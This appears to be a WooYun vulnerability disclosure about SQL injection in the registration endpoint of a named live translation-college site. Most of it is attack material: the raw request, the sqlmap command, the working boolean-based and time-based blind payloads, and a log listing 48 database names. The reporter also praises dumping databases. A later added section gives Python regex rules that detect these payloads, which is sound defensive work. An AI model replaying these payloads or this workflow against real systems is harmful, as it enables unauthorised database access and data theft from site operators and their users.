WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2015-04-29: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-05-04: The vendor has actively ignored the vulnerability; details are disclosed to the public.
What I dislike most is people who constantly ask the vendor for gifts~ Damn! If they really won't give you any, just keep submitting vulnerabilities!! Best to submit very high-risk ones on public holidays!!!~ The database dump matters too!
POST /tools/fanyidasai/fanyidasai.php HTTP/1.1
Host: college.transn.com
Proxy-Connection: keep-alive
Content-Length: 116
Accept: text/plain, */*; q=0.01
Origin: http://college.transn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://college.transn.com/tools/fanyidasai/regist.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

username=123&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class=&number=&cardid=&tel=&email=
[root@Hacker~]# Sqlmap Sqlmap -r E:\1.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al
[*] starting at 10:11:18
[10:11:18] [INFO] parsing HTTP request from 'E:\1.txt'
[10:11:18] [INFO] testing connection to the target URL
[10:11:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
[10:11:20] [INFO] target URL is stable
[10:11:20] [INFO] testing if POST parameter 'username' is dynamic
[10:11:20] [WARNING] POST parameter 'username' does not appear dynamic
[10:11:20] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[10:11:20] [INFO] testing for SQL injection on POST parameter 'username'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[10:11:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:11:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:28] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[10:11:29] [INFO] POST parameter 'username' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[10:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL inline queries'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:11:50] [INFO] POST parameter 'username' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[10:11:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:11:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou
[10:11:50] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automaticall
[10:11:51] [INFO] target URL appears to have 37 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[10:12:10] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[10:12:10] [INFO] testing 'MySQL UNION query (14) - 22 to 40 columns'
[10:12:12] [INFO] target URL appears to be UNION injectable with 37 columns
[10:12:18] [INFO] testing 'MySQL UNION query (14) - 42 to 60 columns'
[10:12:20] [INFO] testing 'MySQL UNION query (14) - 62 to 80 columns'
[10:12:21] [INFO] testing 'MySQL UNION query (14) - 82 to 100 columns'
[10:12:23] [INFO] testing 'Generic UNION query (14) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=123' RLIKE IF(9850=9850,123,0x28) AND 'dDUu'='dDUu&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=123' AND 4617=BENCHMARK(5000000,MD5(0x75645772)) AND 'kvZl'='kvZl&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m
---
[10:12:34] [INFO] testing MySQL
[10:12:34] [INFO] confirming MySQL
[10:12:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[10:12:34] [INFO] fetching database names
[10:12:34] [INFO] fetching number of databases
[10:12:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:12:34] [INFO] retrieved: 48
[10:12:35] [INFO] retrieved: information_schema
[10:12:49] [INFO] retrieved: TCATPDB
[10:12:55] [INFO] retrieved: bk_release_wattapi
[10:13:09] [INFO] retrieved: ctat
[10:13:12] [INFO] retrieved: edu_web
[10:13:18] [INFO] retrieved: entwcat
[10:13:24] [INFO] retrieved: icatweb
[10:13:30] [INFO] retrieved: miniwcat
[10:13:36] [INFO] retrieved: miniwtm_miniwcat
[10:13:49] [INFO] retrieved: mysql
[10:13:53] [INFO] retrieved: nankaictat
[10:14:01] [INFO] retrieved: nankaitraining
[10:14:12] [INFO] retrieved: nankaitraining_wtm
[10:14:26] [INFO] retrieved: new_training
[10:14:36] [INFO] retrieved: new_training_wtm
[10:14:49] [INFO] retrieved: release_translib
[10:15:01] [INFO] retrieved: release_wattapi_new
[10:15:19] [INFO] retrieved: school
[10:15:24] [INFO] retrieved: school_bfsu
[10:15:33] [INFO] retrieved: school_bfsu_wtm
[10:15:45] [INFO] retrieved: school_wtm
[10:15:56] [INFO] retrieved: tcat_ent
[10:16:03] [INFO] retrieved: tcat_ent_test
[10:16:13] [INFO] retrieved: tcatwebsite
[10:16:22] [INFO] retrieved: test
[10:16:26] [INFO] retrieved: test0801_wattapi
[10:16:38] [INFO] retrieved: test_entwcat
[10:16:48] [INFO] retrieved: test_translib
[10:16:58] [INFO] retrieved: test_wattapi
[10:17:08] [INFO] retrieved: testctat
[10:17:14] [INFO] retrieved: testedu_web
[10:17:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[10:17:45] [INFO] retrieved: testminiwcat
[10:17:55] [INFO] retrieved: testminiwtm_miniwcat
[10:18:10] [INFO] retrieved: testschool
[10:18:18] [INFO] retrieved: testschool_wtm
[10:18:30] [INFO] retrieved: testtportal
[10:18:39] [INFO] retrieved: testwtm
[10:18:45] [INFO] retrieved: testwtm_miniwcat
[10:18:57] [INFO] retrieved: tportal
[10:19:03] [INFO] retrieved: training
[10:19:10] [INFO] retrieved: training_ctat
[10:19:20] [INFO] retrieved: training_wtm
[10:19:30] [INFO] retrieved: transndict
[10:19:38] [INFO] retrieved: transndict_logs
[10:19:52] [INFO] retrieved: v_translib
[10:20:00] [INFO] retrieved: v_wattapi
[10:20:08] [INFO] retrieved: wtm
[10:20:11] [INFO] retrieved: wtm_miniwcat
available databases [48]:
[*] bk_release_wattapi
[*] ctat
[*] edu_web
[*] entwcat
[*] icatweb
[*] information_schema
[*] miniwcat
[*] miniwtm_miniwcat
[*] mysql
[*] nankaictat
[*] nankaitraining
[*] nankaitraining_wtm
[*] new_training
[*] new_training_wtm
[*] release_translib
[*] release_wattapi_new
[*] school
[*] school_bfsu
[*] school_bfsu_wtm
[*] school_wtm
[*] tcat_ent
[*] tcat_ent_test
[*] TCATPDB
[*] tcatwebsite
[*] test
[*] test0801_wattapi
[*] test_entwcat
[*] test_translib
[*] test_wattapi
[*] testctat
[*] testedu_web
[*] testminiwcat
[*] testminiwtm_miniwcat
[*] testschool
[*] testschool_wtm
[*] testtportal
[*] testwtm
[*] testwtm_miniwcat
[*] tportal
[*] training
[*] training_ctat
[*] training_wtm
[*] transndict
[*] transndict_logs
[*] v_translib
[*] v_wattapi
[*] wtm
[*] wtm_miniwcat
[10:20:24] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
[10:20:24] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\college.transn.com'
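An added defensive example, not part of the original report: a small Python rule set that flags the two payload families sqlmap identified above (boolean-based blind via RLIKE IF(...) and time-based blind via BENCHMARK(...)) in URL-encoded form bodies, so a log review or request filter on the registration endpoint can catch this class of probe. The function and rule names are my own, and the sample bodies are constructed from the payloads shown in the log.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Signatures derived from the two payload families sqlmap reported above:
# boolean-based blind via RLIKE IF(...) and time-based blind via BENCHMARK(...).
# The quoted-tautology rule catches the trailing AND 'xxxx'='xxxx both share.
SIGNATURES = {
    "mysql_boolean_blind_rlike": re.compile(r"\bRLIKE\s+IF\s*\(", re.I),
    "mysql_time_blind_benchmark": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
    "quoted_tautology": re.compile(r"\b(AND|OR)\s+'([^']*)'\s*=\s*'\2", re.I),
}


def decode_body(raw: str) -> dict:
    """Parse a form body; decode a second time so %2527-style double
    encoding cannot hide a quote from the rules."""
    params = parse_qs(raw, keep_blank_values=True)
    return {k: [unquote_plus(v) for v in vs] for k, vs in params.items()}


def scan_body(raw: str) -> list:
    """Return (parameter, rule) pairs for every value matching a signature."""
    hits = []
    for name, values in decode_body(raw).items():
        for value in values:
            for rule, rx in SIGNATURES.items():
                if rx.search(value):
                    hits.append((name, rule))
    return hits


# Constructed samples (hypothetical traffic): a clean registration body, then
# the two payloads from the sqlmap output above, URL-encoded as on the wire.
CLEAN = "username=123&password=123&mode=0&sex=m"
BOOLEAN = ("username=123%27+RLIKE+IF%289850%3D9850%2C123%2C0x28%29"
           "+AND+%27dDUu%27%3D%27dDUu&password=123&mode=0")
TIMEB = ("username=123%27+AND+4617%3DBENCHMARK%285000000%2CMD5%280x75645772%29%29"
         "+AND+%27kvZl%27%3D%27kvZl&password=123")

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("boolean", BOOLEAN), ("time", TIMEB)):
        print(label, scan_body(body))
```

Pattern rules like these only catch known probe shapes; the fix that removes the bug is a parameterized query for the username lookup in fanyidasai.php.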
Dear vendor, I have been asking for contact details for so long that I'm speechless!
Severity: No impact, vendor ignored
Ignored at: 2015-05-04 10:44
Vulnerability Rank: 4 (WooYun rating)
None yet